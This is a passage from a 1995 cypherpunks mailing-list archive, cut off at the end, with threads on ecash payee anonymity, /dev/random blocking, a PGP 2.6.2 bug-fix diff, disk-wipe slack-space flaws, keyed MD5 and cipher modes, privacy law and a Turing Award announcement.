	Bob is now anonymous.

	This requires some trust-in-Ed, but Bob could be anonymous
from Ed just as Ed is anonymous.

	Perhaps this is the scheme lucky mentioned. I will have to get
an account and implement it.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 1 Nov 1995 08:41:50 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <DHAMpE.34y@sgi.sgi.com>
Message-ID: <199510311648.IAA05877@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DHAMpE.34y@sgi.sgi.com>, "Theodore Ts'o" <tytso@MIT.EDU> writes:

>    Date: Mon, 30 Oct 1995 21:59:14 -0500
>    From: "Josh M. Osborne" <stripes@va.pubnix.com>

>    When /dev/random doesn't have "enough" enthropy left does reading
>    from it return an error, or block?  I would strongly suggest
>    blocking, as the non-blocking behavur is not really all that useful.

> It acts like many character devices and named pipes in that if there is
> no entropy available at all, it blocks.  If there is some entropy
> available, but not enough, it returns what is available.  (A subsequent
> read will then block, since no entropy will then be available.)

> Actually, what's currently in Linux doesn't work precisely like this,
> but it will soon.  After talking a number of people on both sides of the
> block vs. non-blocking camp, this seemed to be a suitable compromise.
> At least one Major Workstation Vendor is planning on using this behavior
> for their /dev/random, to appear in a future OS release.  If we all can
> standardize on this behavior, it'll make application writer's jobs that
> much easier.

One problem with this scheme is that if multiple processes have
/dev/random open you can block unexpectedly.  If I try to avoid blocking
by first checking if entropy is available there's a race condition if
another process reads from the device.  Is there another way to avoid
blocking?

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Nov 1995 03:33:11 +0800
To: cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <199510311625.IAA07105@infinity.c2.org>
Message-ID: <199510311703.JAA14785@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> writes:

>To provide payee anonymity:

>Enterprising cypherpunk, Ed sets up the Ecash Remailer.

>Alice pays Bob e$15. Alice is anonymous.
>Bob sends Ed the e$15
>Ed cashes the e$ into his ecash mint account, withdraws e$13.50
>then pays Bob those e$14 .. Bob can now spend those e$ at will.

>	Bob is now anonymous.

>	This requires some trust-in-Ed, but Bob could be anonymous
>from Ed just as Ed is anonymous.

>	Perhaps this is the scheme lucky mentioned. I will have to get
>an account and implement it.

I think this is basically the scheme Lucky mentioned.  A more elaborate
version would have Bob sending Ed blinded proto-coins to be used in the
withdrawal.  However this would require hacking the ecash protocols to
work differently than intended, which would probably infringe the
patents.

What about this, though: Alice did not mean to pay Bob, but rather
Charlie, and Bob stole the coins.  He launders them through Ed's
service.  Charlie never got the cash, and Alice complains to the bank
that the coins were stolen.  The bank says, fine, we can identify the
perpetrator, let's see... it's Ed.  Ed is now charged with theft and
has an expensive and uncertain legal experience ahead of him.

Are you sure you want to put yourself in this position?  You might win,
but it could still be expensive (ask PRZ).  And if your service is seen
as a fencing operation to receive stolen goods with the legitimate uses
just a "cover", you could lose.

Also, I believe in normal use Digicash coins are marked as being for a
specific recipient.  This is not certain since no details have been
released.  And apparently it can be worked-around by the spender by
marking the recipient as just "@" (or some such string).  If this feature
is present in the Mark Twain cash then the payee-anonymity service may
not be very effective.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 1 Nov 1995 02:39:08 +0800
To: cypherpunks@toad.com
Subject: Re: payee anonymity
Message-ID: <acbb9978030210043e77@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:35 PM 10/31/95, Hal wrote:
>Another way payees could be anonymous would be to immediately spend their
>received coins, and do so anonymously.  This works for the online ecash
>system.  They simply pass the coins on without first exchanging them at
>the bank.  There would have to be something they wanted to buy that they
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>could receive anonymously, though.
>

Such as other coins?

(Since I hate cryptic one-liners, I'll elaborate. There seem to be enough
"degrees of freedom" involved in exchange of digital coins such that payee
and payer anonymity is achievable. "Coin mixes" using "shell game" methods
seem adequate. One puts N coins in, gets back N coins, spot checks the
validity of some of the coins by redeeming them, and everyone is happy.
Fraud is contained to manageable proportions.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike_Spreitzer.PARC@xerox.com
Date: Wed, 1 Nov 1995 02:56:13 +0800
To: tytso@mit.edu
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <9510310316.AA26268@dcl.MIT.EDU>
Message-ID: <95Oct31.094528pst."14855(1)"@alpha.xerox.com>
MIME-Version: 1.0
Content-Type: text/plain


Blocking vs. non-blocking is a standard issue in design of U*X devices.
Standard solution: make it block by default, and accept an IOCTL to put it in
non-blocking mode.  There's even a POSIX way to do this:

	flags_or_err = fcntl(fd, F_GETFL, 0);
	{check for error}
	res = fcntl(fd, F_SETFL, flags_or_err | O_NONBLOCK);
	{check for error}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@c2.org
Date: Wed, 1 Nov 1995 03:33:40 +0800
To: cypherpunks@toad.com
Subject: RE: This PROMISes to be odius
Message-ID: <199510311823.KAA17396@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>PR   10/18 0809  ORACLE INTRODUCES SOFTWARE TOOL FOR LAW ENFORCEMENT

Oracle should shange it's corporate motto to:
"Oracle, bringing Big Brother to life" or
something similar. The problem with this sort of
software is that it is virtually made to be abused.

It is very, very obvious that the profit motive and
the reassurances of LEO's have totaly blinded any 
shred of ethics the corporation might have once
entertained.

My reaction to this is simple. In the 70's, it was
acceptible reasoning for computer professionals to
not work in certain sectors of the industry because
they didn't want to be a part of the "military industrial
complex". 

The 90's version of that is simply not to buy products
from vendors who engage in unacceptible practices.
Oracle clearly falls in this latter catagory.

I had been looking very strongly at specifying a 
DB made by one of Oracles competition due to experience
with it's nightmarish installation procedures, but this
pretty much clinches the deal where nothing else would.

The funny thing here is that since this is just a current
sale, and since there's allready plenty of technical 
reasons to look at competing products, I'd bet even 
money that over a relativly short amount of time 
I can offset ALL of the sales for this odious LEO
product alone.

I would encourage others to do the same.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Castleberry <jcastle@in-system.com>
Date: Wed, 1 Nov 1995 03:37:13 +0800
To: cypherpunks@toad.com
Subject: PGP 2.6.2 signator replacement bug fix
Message-ID: <9510311803.AA11158@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Here's a fix for a minor bug in PGP 2.6.2.  I reported it to pgp-bugs last
February and they responded promptly, but it hasn't been propagated to the
release - I suppose 2.6.2 is "in the freezer".

Anyway, the bug can cause a crash and other folks might like to put in the
fix, so here it is.  Anyone have any others?

Jim Castleberry
jcastle@in-system.com

Original bug report starts here:
- -------------------------------------------------------------------------

I believe I've identified a bug in PGP 2.6.2.  The bug occurs on my system:
	HP 9000/735, running HPUX 9.03
	MIT PGP 2.6.2
	Compiled with either the native cc or gcc 2.6.3
	Optimization level doesn't change the behavior (from -O0 to +O3).
	pubring.pgp contains all the keys on the servers, plus a few
	   unpublished keys and some additional signatures.

When an existing signature is replaced by a newer one by the same signator,
memory gets corrupted.  On my system, this results in a program abort.

The problem is in file keyadd.c, function mergesigs().  When a signature is
(possibly) going to be replaced, user_from_keyID() is called to get a pointer
to the signator's user ID (as a C string in the in-memory user hash table.
Then that pointer is passed to check_key_sig(), which passes it to
getpublickey(), which passes it to readpublickey(), which reads successive
user ID strings into it while it searches for the desired keyID.  But the hash
table contains dynamically allocated strings that are only as long as the
string they hold.  So when a longer user ID is read into it, memory past the
end of the C string is corrupted.  That trashes a hash table entry ("struct
hashent"), destroying pointers and resulting in an illegal memory access later
in the program.

The offending code in mergesigs() only gets executed when a signature is being
replaced with a more recent one by the same signator.  It only showed up
because I updated my pubring with all new keys on the servers for the last 31
days, and one key has an updated sig on it:
   pub  1024/AB1F4831 1993/05/10 Robert Walking-Owl <rrothenb@ic.sunysb.edu>
			         Robert Walking-Owl <robert.rothenburg@asb.com>

Here's a context diff for the fix.  The signator userid isn't needed by
check_key_sig() or the functions it calls since the signator's keyID is given,
and if the userid is NULL then readkeypacket() ignores it, so just pass NULL to
check_key_sig() and use the signator C string in mergesigs() as-is.

Jim Castleberry

- - cut here -------------------------------------------------------------------

*** old/keyadd.c	Wed Oct  5 20:48:11 1994
- --- keyadd.c	Wed Feb 15 22:37:53 1995
***************
*** 196,206 ****
  			    status = check_key_sig(fring,
  						   KeyIDpos, KeyIDlen,
  						   userid, fkey, keypos,
! 						   ringfile, signator,
  						   (byte *) & xstamp,
  						   &sigClass);
  			PascalToC(userid);
- - 			PascalToC(signator);
  			if (!status) {
  			    fprintf(pgpout,
  				    LANG("Replacing signature from %s\n"),
- --- 196,205 ----
  			    status = check_key_sig(fring,
  						   KeyIDpos, KeyIDlen,
  						   userid, fkey, keypos,
! 						   ringfile, NULL,
  						   (byte *) & xstamp,
  						   &sigClass);
  			PascalToC(userid);
  			if (!status) {
  			    fprintf(pgpout,
  				    LANG("Replacing signature from %s\n"),

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMJZkDJYkAuN55UFhAQG8aQf/bsx7xlS9P9SBE8ysMEbjMkKwdf6yZSCt
fd0xBsUbTIsIS2Gzlx0ux7N3HWqJm/og2EBqebhfEzQk9IUBK8sp8Kbv8GtbUWrj
ai2b6/hxu2yXbtQEAmTDJLO3fQCZ6yjkydFYaz2n+HuRxN4h6TlWwIHzQWOBCxuK
qzPENr+c4YgMCHMVLGnAHDgPA8G9J/xX3UIPKQJQnrpAJwlGf+LTOkWeA+/kMLiw
aos108n6698mcsIxXzHltCVlCaYYY6meFMHzD4rGjXOCURTtKTSRx1dJ7WNSn+1N
JNwJSnFXrsvJRodko0fjpYnCUDNEbmEQgDsJX80wTdDfI+JH2LM/+g==
=jh+s
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Wed, 1 Nov 1995 05:58:16 +0800
To: cypherpunks@toad.com
Subject: Re: FCPUNX:Macintosh [and perhaps other OS] Security Alert (fwd)
Message-ID: <Pine.SUN.3.91.951031111730.1148V-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain




==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================

---------- Forwarded message ----------
Date: Sat, 28 Oct 1995 11:12:00 -0400
From: Sal Denaro <Sal@panix.com>
To: Ray Arachelian <sunder@amanda.dorsai.org>
Subject: Re: FCPUNX:Macintosh [and perhaps other OS] Security Alert (fwd)

> ---------- Forwarded message ----------
> Date: Sun, 15 Oct 1995 01:05:06 -0400
> From: Lucky Green <shamrock@netcom.com>
> To: cypherpunks@toad.com
> Subject: Macintosh [and perhaps other OS] Security Alert
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> A number of months ago, I discovered that various Macintosh "unused
> diskspace" wipe utilities (Norton, Burn) fail to wipe the unused
> slackspace at the end of the last block allocated to a file. This leaves
> NumberOfFiles*512Bytes/2 = several kB of recoverable data on your average
> drive.
> 

I can verify that this is a cross-platform bug. The Dos/win3.1 and
Win95 versions all have the same flaw. 

-- 
Salvatore Denaro		
sal@panix.com                    Spinning dreams with angel wings
Yes, I use PGP                     torn blue jeans/a foolish grin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 1 Nov 1995 07:49:33 +0800
To: nobody@replay.com
Subject: Re:  InfoWar
Message-ID: <9510311924.AA09550@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


 
>Industry representatives played down the privacy loopholes.
>Ronald Plesser, a Washington attorney who represents online
>services and direct marketing firms, said, "I know of no
>example of anybody trafficking in e-mail descriptions." A
>spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
>do not release names of customers that ordered movies.
 
The name of the customer of a video tape rental may be disclosed
only under narrow constraints (USC 18 Chap 121 2710):

   *  (b) Video Tape Rental and Sale Records. - (1) A video tape service
     provider who knowingly discloses, to any person, personally identifiable
     information concerning any consumer of such provider shall be liable to
     the aggrieved person for the relief provided in subsection (d).
 
     (2) A video tape service provider may disclose personally identifiable
     information concerning any consumer -
        o  (A) to the consumer;
        o  (B) to any person with the informed, written consent of the consumer
          given at the time the disclosure is sought;
        o  (C) to a law enforcement agency pursuant to a warrant issued under
          the Federal Rules of Criminal Procedure, an equivalent State warrant,
          a grand jury subpoena, or a court order;
        o  (D) to any person if the disclosure is solely of the names and
          addresses of consumers and if -
             +  (i) the video tape service provider has provided the consumer
               with the opportunity, in a clear and conspicuous manner, to
               prohibit such disclosure; and
             +  (ii) the disclosure does not identify the title, description,
               or subject matter of any video tapes or other audio visual
               material; however, the subject matter of such materials may be
               disclosed if the disclosure is for the exclusive use of
               marketing goods and services directly to the consumer;
        o  (E) to any person if the disclosure is incident to the ordinary
          course of business of the video tape service provider; or
        o  (F) pursuant to a court order, in a civil proceeding upon a showing
          of compelling need for the information that cannot be accommodated by
          any other means, if -
             +  (i) the consumer is given reasonable notice, by the person
               seeking the disclosure, of the court proceeding relevant to the
               issuance of the court order; and
             +  (ii) the consumer is afforded the opportunity to appear and
               contest the claim of the person seeking the disclosure. If an
               order is granted pursuant to subparagraph (C) or (F), the court
               shall impose appropriate safeguards against unauthorized
               disclosure.
 
               (3) Court orders authorizing disclosure under subparagraph (C)
               shall issue only with prior notice to the consumer and only if
               the law enforcement agency shows that there is probable cause to
               believe that the records or other information sought are
               relevant to a legitimate law enforcement inquiry. In the case of
               a State government authority, such a court order shall not issue
               if prohibited by the law of such State. A court issuing an order
               pursuant to this section, on a motion made promptly by the video
               tape service provider, may quash or modify such order if the
               information or records requested are unreasonably voluminous in
               nature or if compliance with such order otherwise would cause an
               unreasonable burden on such provider.
   *  (c) Civil Action. - (1) Any person aggrieved by any act of a person in
     violation of this section may bring a civil action in a United States
     district court.
 
In other words it can be a federal crime to release personal info.
(Without regard to ordering movies over the internet)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 07:48:45 +0800
To: Kevin L Prigge <klp@gold.tc.umn.edu>
Subject: PGP On shared machines (was Re: Keyed-MD5, ITAR, and HTTP-NG)
In-Reply-To: <3095c7353a43002@noc.cis.umn.edu>
Message-ID: <Pine.SOL.3.91.951031113820.1151B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


One important thing to note in an academic environment is that if you 
have foreign students who are on non-green card visas, you may need to 
get an export licence if they can access the server. I expect you'll 
probably get the licence without too much hassle, and you're unlikely to 
be indicted for this, but it's something to be aware of.

Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Wed, 1 Nov 1995 02:12:43 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510302351.AA28243@zorch.w3.org>
Message-ID: <199510311647.LAA01071@fuseki.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


"h" == hallam  <hallam@w3.org> writes:

h> There is some work by Phil Rogaway on making keyed digest
h> functions which I strongly recommend people look at. I can post a
h> paper on the subject if people are interested.

There's also ``Message Authentication with MD5'' by Burt Kaliski and
matt Robshaw in RSA Laboratries' CryptoBytes,
http://www.rsa.com/rsalabs/cryptobytes/spring95/md5.htm,

michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 08:27:05 +0800
To: rsalz@osf.org>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510310430.AA08480@sulphur.osf.org>
Message-ID: <9510311650.AA32634@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>How are you going to handle mechanism negotiation?

This is a must do item, Simon is haviung to do >lots< of this.

One way of looking at HTTP is as a huge negotiation mechanism. Another way to
look at HTTP is as a large dougnut with sugar frosting, the first is more widely 
accepted.


There has to be more than one crypto mechanism so don't chose. In fact I forgot to 
add our favourite algorithms, such as Skipjack in OFB mode to the list :-)


What DES modes should be bothered with? I always feel that the lumping in of every 
cipher mode under the sun is an irritation. We need a transparent cipher, looking 
very much like a stream cipher (hence the probable reason for Simon hankering after 
RC4). We could use CFB or OFB. 

I don't like OFB myself, it seems to be a bit lame to only XOR a stream of pseudo 
random stuff with the plaintext. CFB also has the stream cipher like property that 
incomplete blocks can be decoded provided that the stride is set right, this means 
that for a 64 bit block cipher one is 8 time slower :-(


Anyone any ideas on the following ?

SEQ
    x = IV
    SEQ
    	c[i] = E(x,K) XOR p[i]
    	x = c[i] 

This is essentially OFB mode but instead of having an XOR with an alledged random 
number generator (which I find disturbing), there is a mix in of the output.

Other mixes to try ?

	x = c[i] XOR E(x,K)

OFB is the following BTW :-

	x = E(x,K)


Note that there may be value in keeping the IV secret in this case. There is probably 
some hack that means that the IV can be finessed but it looks like work.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike_Spreitzer.PARC@xerox.com
Date: Wed, 1 Nov 1995 04:59:25 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510310427.AA28252@zorch.w3.org>
Message-ID: <95Oct31.115132pst."14646(5)"@alpha.xerox.com>
MIME-Version: 1.0
Content-Type: text/plain


Isn't this what the GSS-API is about?  Couldn't HTTP-NG just convey GSS
"tokens", and do something about getting both sides to agree on which GSS
"mechanism" is to be used, and on what Principals are involved?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Wed, 1 Nov 1995 03:21:41 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: Four Horsemen (was Re: PA Remailer Concerns)
In-Reply-To: <3541.9510161053@exe.dcs.exeter.ac.uk>
Message-ID: <9510311715.AA01975@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Sorry I'm late to the gate on this one, but from what
I have read on the traffic concerning this law (I've been
out of town a good bit lately, so I am playing catch-up)
there's been a few aspects of this odious law that have
been overlooked.

What struck me in a most glaring manner are the constitutional
issues surrounding this law. Specificly, aside from the remailer
aspects of the law, they attempt to enact prior restraint on
the publication of plans for electronic devices & the like.

The aspects of the law that cover publication do not look
as if they can pass constitutional muster. Especaily considering
the supreme court here has recently ruled that it is permissible
to publish unsigned political handbills and the like. Much like
what the output of an anonymous remailer produces after all.

Some of the issues they attempt to address in this law, are
done so poorly, and with such ignorance of legal precedent and
basic constitutional reference that I find it utterly amazing
that the govenor would sign it, and that it would have been
forwarded to him in the form they enacted.

I do not think that the law is capable of surviving any sort of
legal test based on much of what they've inserted. But I guess
that's for the courts to decide.

In any case, considering it's halloween, I would count the
Pensilvania Govenor lucky if Ben Franklin doesn't rise
from his grave and come strangle the bastard in his bed.

As it is, I'm sure old Ben could probably be used as a good
gyroscope with all the spinning in his grave that must be
going on. Pennsilvania the cradle of liberty? Hah, it looks
more like the cradle of repression to me. They sold liberty
and their souls in a devils bargain for an illusory peace of
mind with this one.


Tim Scanlon



________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: madden@mpi-sb.mpg.de (Peter Madden)
Date: Tue, 31 Oct 1995 20:33:52 +0800
To: cypherpunks@toad.com
Subject: Turing Award
Message-ID: <199510311219.NAA02181@mpii02024.ag2.mpi-sb.mpg.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi All,

Further to previous cypherpunk discussions on cryptography, and on program
checking/verification, the below announcement of this years Turing Award
should be of interest (apologies if this is old news).

Pete

=================================================================

Dr Peter Madden,                                Email: madden@mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,            Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.    Fax: (49) (681) 302-5401

=================================================================


----- Begin Included Message -----

>From seidel@cs.uni-sb.de Thu Oct 26 08:57:10 1995
Date: Thu, 26 Oct 1995 08:57:02 +0100
From: seidel@cs.uni-sb.de (Raimund Seidel)
To: profs@sol.cs.uni-sb.de
Subject: Turing Award
Content-Length: 4661

------- Forwarded Message
 
 
ACM'S A.M. Turing Award, computing's highest honor, goes to
Manuel Blum of University of California, Berkeley
Date: Saturday, October 21, 1995 3:55PM
 
BW1320  OCT 20,1995      15:22  PACIFIC      18:22  EASTERN
 
 
( BW)(ACM/TURING-AWARD/BLUM) ACM'S A.M. Turing Award, computing's
highest honor, goes to Manuel Blum of University of California, Berkeley
 
    Business Editors
 
    NEW YORK--(BUSINESS WIRE)--Oct. 20, 1995--Considered the Nobel
Prize of Computing, the A. M. Turing Award of the Association for
Computing Machinery (ACM), will be given to distinguished computer
scientist, Manuel Blum, of the University of California, Berkeley.
The award will be presented to Blum at a special awards ceremony
during the kick off of ACM's yearlong 50th anniversary celebration,
February 14-18, 1996 in Philadelphia.
    Blum was honored with the Turing Award "in recognition of his
contributions to the foundation of computational complexity theory
and its applications to cryptography and program checking."
computing devices, Blum's research has developed around a single
unifying theme: finding positive, practical consequences of living in
a world where all computational resources are bounded.  Blum shows
that secure business transactions, pseudo-random number generation,
and program checking are all possible precisely because all
computational devices are resource bounded.
    Blum is one of the founders of computational complexity theory, a
field that is central to theoretical computer science, and one which
deals with measuring the difficulty of performing computations.  His
work on machine-independent complexity yields a theory of
computational cost that is relevant also to practical problems.
Cryptographic protocols which are used in the transmission of
sensitive information are secure because they can be shown to be
information in a cryptographically encoded message without going
through an inordinately complex computation that would be
prohibitively costly and time consuming to perform.  For computer
programs it is very difficult to develop perfectly error-free
programs.  In this area Blum has shown how his techniques can be
applied to make programs more reliable, and to check their results.
Since this work is very fundamental one can expect that it will find
application to many other practical problems, as well.
    "Manuel Blum is a profound thinker,"  said ACM President Stuart
H. Zweben, chairman of the department of computer and information
science at Ohio State University, "his seminal work, insights and
approaches have brought about new avenues of research in the area of
computational complexity and established foundations for what people
can compute.  Furthermore, his work has influenced other Turing Award
winners to a significant degree."
    The ACM A. M. Turing Award is given annually for technical
achievements in the field of computing which are deemed by a jury of
leading professionals to be of lasting and significant importance to
the computing community.  It is accompanied by a prize of $25,000
contributed by AT&T.
    Dr. Blum is University of California at Berkeley's Arthur J.
Chick Professor in Electrical Engineering and Computing Sciences, a
Department in which he has served since 1968.  Dr.  Blum was born in
Caracas, Venezuela in 1938 and began his academic career at the
Massachusetts Institute of Technology, where he received his B.S.,
Warren S. McCulloch, Hartley Rogers Jr. and Marvin Minsky.  Dr.
Blum is renowned for his work on computational complexity, automata
theory, inductive inference, cryptography and program
result-checking.  During his career, Dr.  Blum has received numerous
awards, published 47 technical papers and advised 26 Ph.D.  students.
    ACM, founded in 1947, is an 85,000 member international
scientific and educational organization dedicated to advancing the
art, science, engineering and application of information technology.
ACM serves both professional and public interests by fostering the
open interchange of information and by promoting the highest
professional and ethical standards.  This is accomplished through its
many publications, conferences, special interest groups, chapters and
network communications.
 
    --30---rg/ny*
 
    CONTACT: Terrie Phoenix
             (212) 626-0531
             phoenix@acm.org
    KEYWORD: NEW YORK
    INDUSTRY KEYWORD: COMPUTERS/ELECTRONICS COMED
 
 
REPEATS: New York 212-575-8822 or 800-221-2462; Boston 617-236-4266 or
         800-225-2030; SF 415-986-4422 or 800-227-0845; LA 310-820-9473
     BW URL: http://www.hnt.com/bizwire
 
 
------- End of Forwarded Message
 


----- End Included Message -----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 04:16:56 +0800
To: John Lull <lull@acm.org>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <199510311650.IAA09144@ix2.ix.netcom.com>
Message-ID: <9510311855.AA00379@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I would prefer to see MD5 deleted.  A 128 bit hash simply seems too
>marginal in length for long term use in most hash applications.  I
>would much rather see something like Haval as a second hash algorithm.
>It can be faster than MD5, and can easily be tailored to the hash
>width you want.  If 128 bit hashes are really needed, use Haval's
>128-bit option.

MD5 is pretty well entrenched in IETF circles and since RSAREF only
provides Md2, MD4 and MD5 there has to be an option to use at least 
one of them. MD5 is the best of that set IMHO.

For Phil Rogaway's comments on keyed MD5 see :-

http://wwwcsif.cs.ucdavis.edu/~rogaway/papers/draft-rogaway-ipsec-comments-00.tx
t

Unfortch much of the information he gave in his talk appears not to be there. 
C'est la vie as they say in Canada.

Also the cryptobytes article Miclael found an online for is well worth 
a look. http://www.rsa.com/rsalabs/cryptobytes/spring95/md5.htm
I would have quoted it but I didn't know it was avaliable in e-form. The
cryptobytes articles are well worth reading in general.

Also on Phil's page:
http://wwwcsif.cs.ucdavis.edu/~rogaway/papers/list.html

 Mihir Bellare, Roch Guerin and Phillip Rogaway
     XOR MACs: New methods for message authentication using finite pseudorandom 
functions,
     Crypto '95. 


	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 07:11:30 +0800
To: cypherpunks@toad.com
Subject: Cryto article in SJ Mercenary
Message-ID: <Pine.SOL.3.91.951031140028.1151G-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


There's a full page equivalent article on encyption in today's San Jose
Mercury News (12E-11E). The article concentrates on public key
cryptography, and mixes some good stuff with some silly mistakes. The
first page has about 4/5th of the article devoted to a big diagram showing
how someone using public key encryption to cover a whole message, and sent
it over the internet to someone in Argentina. All this without a mention
of using symmetric cyphers, and without even mentioning ITAR. 

Another 1/8th of this page is given over to a bunch of cypher text that
supposedly encodes the address of "Mr Cosmic Kumquat, SSl Trusters etc.." 
This address looks kind of familiar... but they seem to imply that the 
cyphertext is the output of an RSA encrpytion, not RC4. 

They then go on to discuss factoring, and explain the difference between 
the strength of algorithms in theory, and how Netscape became vulnerable 
due to "beginners mistakes" in the implementation, and how security is 
best assured by open disclosure, not security through obscurity. 

Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 07:48:45 +0800
To: cypherpunks@toad.com
Subject: Perfect Forward Secrecy - is it worth it?
Message-ID: <Pine.SOL.3.91.951031141506.1151H-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Quick survey; how important is perfect forward secrecy to you? I've asked 
three people locally so far and gotten four different answers, so in the 
spirit of spreading divisiveness where'er I go, I'll try and get a few 
more opinions here :-) 

In general, schemes offering PFS require a extra PK-op, and an extra 
round-trip when compared to  non-PFS schemes. This cost is incurred once 
per "session", but can add on the order of seconds to startup times. 
Should key-management schemes where PK is available always provide PFS, 
allow PFS, or not provide PFS? The amount of code needed to implement 
each choice point is similar, if you're using something like BSAFE. 

Simon
---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)  ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 1 Nov 1995 05:33:03 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ecash remailer
In-Reply-To: <199510311703.JAA14785@jobe.shell.portal.com>
Message-ID: <199510311940.OAA31415@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
[suggesting a problem with Ed the Currency Cleaner]
> What about this, though: Alice did not mean to pay Bob, but rather
> Charlie, and Bob stole the coins.  He launders them through Ed's
> service.  Charlie never got the cash, and Alice complains to the bank
> that the coins were stolen.  The bank says, fine, we can identify the
> perpetrator, let's see... it's Ed.  Ed is now charged with theft and
